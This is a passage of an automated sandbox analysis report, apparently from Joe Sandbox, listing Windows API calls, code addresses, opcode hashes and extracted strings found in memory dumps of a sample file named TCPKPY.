                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 3701255441-0
                                                                                                                • Opcode ID: 007f47365d6ca8b965e3ddfe2dc0977a6a347dd4b0a37714ffa8527a5019afa7
                                                                                                                • Instruction ID: df7373639143ef6eb92ae037959c1f0b105894d63ce8b394479e5b7124b75216
                                                                                                                • Opcode Fuzzy Hash: 007f47365d6ca8b965e3ddfe2dc0977a6a347dd4b0a37714ffa8527a5019afa7
                                                                                                                • Instruction Fuzzy Hash: A121C3352106119FDB00AF28DC89B6EB7A9EF44720F048019F9069B3D2CA70EC598B51
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 002589CE
                                                                                                                • GetForegroundWindow.USER32 ref: 002589E5
                                                                                                                • GetDC.USER32(00000000), ref: 00258A21
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00258A2D
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00258A68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 879d68645e21984251c0f97e82405e06f2d7d1621727758233b4f66ef526077a
                                                                                                                • Instruction ID: b1d67ed167d72a5af949beadd3fbde71fdfb209104e0f518f663d0156ed26dc7
                                                                                                                • Opcode Fuzzy Hash: 879d68645e21984251c0f97e82405e06f2d7d1621727758233b4f66ef526077a
                                                                                                                • Instruction Fuzzy Hash: E721C679A10204EFDB04EF65DC89AAA7BF9EF44301F048478E84997392DB70AC04CB50
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B5FA
                                                                                                                • BeginPath.GDI32(?), ref: 0021B611
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B63B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 75495552a386a4e8ace11f960334c074b323e0b59bbebe0927eb8da6cb9c31da
                                                                                                                • Instruction ID: f872a23aab156b59bf57bd663857689ab55b012c8a10954a4a31e338b7371e71
                                                                                                                • Opcode Fuzzy Hash: 75495552a386a4e8ace11f960334c074b323e0b59bbebe0927eb8da6cb9c31da
                                                                                                                • Instruction Fuzzy Hash: 5A21AC70825346EBEB12AF15FD4EBE97BF9FB22325F504216E814920E2C37088F58B50
                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 00222E81
                                                                                                                • CreateThread.KERNEL32(?,?,00222FB7,00000000,?,?), ref: 00222EC5
                                                                                                                • GetLastError.KERNEL32 ref: 00222ECF
                                                                                                                • _free.LIBCMT ref: 00222ED8
                                                                                                                • __dosmaperr.LIBCMT ref: 00222EE3
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2664167353-0
                                                                                                                • Opcode ID: a57303089113ce77e4892c2cc2ac5b737c93b641709a21886be4f616f647c669
                                                                                                                • Instruction ID: c3546df389b1b5a8b3283dd0f33e6ca092dda180816c1806e0a5e4724652d784
                                                                                                                • Opcode Fuzzy Hash: a57303089113ce77e4892c2cc2ac5b737c93b641709a21886be4f616f647c669
                                                                                                                • Instruction Fuzzy Hash: F5110836125326FFD720AFE5BC42DAB7BE8EF04770B110029F91486191EB32E8249B61
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
                                                                                                                • GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
                                                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: 39c0acf48ffd2d217292602b82d2984c79839ad618ae74312aa33e7988bf87dd
                                                                                                                • Instruction ID: fe920edb0c0f983746e3261eb7ad5e15ca036e9c911e48c8ea9ac2375aac370b
                                                                                                                • Opcode Fuzzy Hash: 39c0acf48ffd2d217292602b82d2984c79839ad618ae74312aa33e7988bf87dd
                                                                                                                • Instruction Fuzzy Hash: DC016DB5212209BFDB119FA5EC8CE6B3BADEF8A765B100029F645C2190DB718C54DF60
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00248371
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0024837F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00248387
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00248391
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: b3d0a6f3ecdaef2cc1ebcff70942e387f319630ba3a63dc065f6fff7704aba9d
                                                                                                                • Instruction ID: c466cd3d5b1d63ae539c0f6588b5eb0496c483454f42fc523f3004f6ccc54fbd
                                                                                                                • Opcode Fuzzy Hash: b3d0a6f3ecdaef2cc1ebcff70942e387f319630ba3a63dc065f6fff7704aba9d
                                                                                                                • Instruction Fuzzy Hash: 63012935D2161ADBDF04AFE8ED4CAEEBB78FF08B01F000095E945B2190DF7495649BA1
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32 ref: 0023A874
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 0023A88F
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 0023A89D
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0023A8AD
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0023A8B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: abf6cdc1f060da26b7caf5e90df9ccc8bde407937f460e05150c6f39ca6342df
                                                                                                                • Instruction ID: 82e68f8a63c2ed6a30ca2ea4662fe2ab7fefba501074a750ab00feec421849f2
                                                                                                                • Opcode Fuzzy Hash: abf6cdc1f060da26b7caf5e90df9ccc8bde407937f460e05150c6f39ca6342df
                                                                                                                • Instruction Fuzzy Hash: 05018BBA612205AFEB105F68EC88BAABBEDEF443A1F104034B941D2250D770DD568BA1
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0023B7A5
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0023B7AF
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0023B7BE
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0023B7C5
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023B7DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 0fe40ea9e37e590790a4f42123a3a058d1ad0b19f3c6c9d12466b393bb842d86
                                                                                                                • Instruction ID: 2ce7247a0ad6ba1e4c3fec1c344e935430137965c4f91fe6034cb7beacdb2155
                                                                                                                • Opcode Fuzzy Hash: 0fe40ea9e37e590790a4f42123a3a058d1ad0b19f3c6c9d12466b393bb842d86
                                                                                                                • Instruction Fuzzy Hash: 18F0AF7A2413056FEB111FA4BC8CE677BACFF86B55F100019FA04CB190DB619C158B60
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0023B806
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0023B810
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B81F
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B826
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0023B83C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 42990bbddb40a2b2abdb575b85f696b01cbf91a77deaf5c4f902b7170a0c155d
                                                                                                                • Instruction ID: 04c51815d9eb1419e6d35f9c310708773eb27c75be2b9beffde8c13e3eadb823
                                                                                                                • Opcode Fuzzy Hash: 42990bbddb40a2b2abdb575b85f696b01cbf91a77deaf5c4f902b7170a0c155d
                                                                                                                • Instruction Fuzzy Hash: 53F03C792112056FEB221FA5FC8CE673B6CFF46764F100029FA45C6190DB6198568B60
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0023FA8F
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0023FAA6
                                                                                                                • MessageBeep.USER32(00000000), ref: 0023FABE
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0023FADA
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0023FAF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 3d948b5f3cadcc5ed6b7cd4cfd1abefe74d531713bffc7291ef92304b15c5d05
                                                                                                                • Instruction ID: d464afcd956c079e896dad690ece0faa34c16fadfc6748392b0325f3bf785638
                                                                                                                • Opcode Fuzzy Hash: 3d948b5f3cadcc5ed6b7cd4cfd1abefe74d531713bffc7291ef92304b15c5d05
                                                                                                                • Instruction Fuzzy Hash: BD018175910705ABEB60AF20FE4EB9677B8FB00B09F04016AB187A54E1DBF4A9588B40
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 0021B526
                                                                                                                • StrokeAndFillPath.GDI32(?,?,0027F583,00000000,?), ref: 0021B542
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B555
                                                                                                                • DeleteObject.GDI32 ref: 0021B568
                                                                                                                • StrokePath.GDI32(?), ref: 0021B583
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: eb93e0a1b9718b40f843faa4e5c7203515b2ebabb6ac2e669df7ca67ddc009c0
                                                                                                                • Instruction ID: d9067a633a7046ee471e1fffb38e35280fe8f8fb96706644f2cc1071238d93f9
                                                                                                                • Opcode Fuzzy Hash: eb93e0a1b9718b40f843faa4e5c7203515b2ebabb6ac2e669df7ca67ddc009c0
                                                                                                                • Instruction Fuzzy Hash: C2F0193401A605ABEB126F29FC0DB943FF2AB12322F448314E4A9840F1C73199B9DF00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: dE+
                                                                                                                • API String ID: 0-2435709166
                                                                                                                • Opcode ID: d45c3b283abdb6cf98b869659ba40ae5833dc744b03e6dc58319b254e39c98ed
                                                                                                                • Instruction ID: 8711ee6bedbd9a9cdb2b0ff575741bd32cf918e4ddf93797f8937be765a8dde0
                                                                                                                • Opcode Fuzzy Hash: d45c3b283abdb6cf98b869659ba40ae5833dc744b03e6dc58319b254e39c98ed
                                                                                                                • Instruction Fuzzy Hash: F2F189716187019FC714DF28C984B5AB7E1FF88315F10892EF9998B292DB70E959CF82
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0024FAB2
                                                                                                                • CoCreateInstance.OLE32(0028DA7C,00000000,00000001,0028D8EC,?), ref: 0024FACA
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • CoUninitialize.OLE32 ref: 0024FD2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: cdc9c28416ffd427be37fcb824596c2922e33b409292c3d789de0ee970bb98bf
                                                                                                                • Instruction ID: fab8668929b0e14cafccd25e5f4a4a7e9ac40feeb37e406f5b97653f2174f8bd
                                                                                                                • Opcode Fuzzy Hash: cdc9c28416ffd427be37fcb824596c2922e33b409292c3d789de0ee970bb98bf
                                                                                                                • Instruction Fuzzy Hash: D0A16AB1614301AFD304EF64C891EABB7EDAF98704F40491DF19587192EB70EA59CFA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002478AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002478CB
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0024F04D
                                                                                                                • CoCreateInstance.OLE32(0028DA7C,00000000,00000001,0028D8EC,?), ref: 0024F066
                                                                                                                • CoUninitialize.OLE32 ref: 0024F083
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: fac9535ffd02027c512f1c638d5e51534700461686bc154b9b05c8593a06ff7f
                                                                                                                • Instruction ID: 0a83da86cbb53df1a790a82184ccde7d030beffc009bbc8e79ac063dd6a4ef81
                                                                                                                • Opcode Fuzzy Hash: fac9535ffd02027c512f1c638d5e51534700461686bc154b9b05c8593a06ff7f
                                                                                                                • Instruction Fuzzy Hash: 45A165756243029FCB14DF14C984D5ABBE5BF88320F148998F89A9B3A2CB31ED55CF91
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00223F7D
                                                                                                                  • Part of subcall function 0022EE80: __87except.LIBCMT ref: 0022EEBB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: 72731f38b71f8f6db04932f7f56dbd2aa563aabf1617bc03f4d42e119fe5f828
                                                                                                                • Instruction ID: 45ce28cc1990e0f2c36ab365f965527e8952bfdd2dc5f66bc009286ceb18f6d0
                                                                                                                • Opcode Fuzzy Hash: 72731f38b71f8f6db04932f7f56dbd2aa563aabf1617bc03f4d42e119fe5f828
                                                                                                                • Instruction Fuzzy Hash: 39517020D38223B6DB15FFD4FB4137A3BB49B00710F204D29E495455E9EB788EF8AA42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #$+
                                                                                                                • API String ID: 0-2552117581
                                                                                                                • Opcode ID: dfc29106a6aeadafc547dd8a7d6b568cb3ce1a67502c3d649bbb7a59a27fb74e
                                                                                                                • Instruction ID: e3945d813cbce2c8786725d75b54fd10f42399c7a119da04ff6df6b8da285cd2
                                                                                                                • Opcode Fuzzy Hash: dfc29106a6aeadafc547dd8a7d6b568cb3ce1a67502c3d649bbb7a59a27fb74e
                                                                                                                • Instruction Fuzzy Hash: C2513335124256CFDF11EF68C444AFA3BA0AF26314F248051FC569B2D1D7749EB2CB21
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0029DC40,?,0000000F,0000000C,00000016,0029DC40,?), ref: 0024507B
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
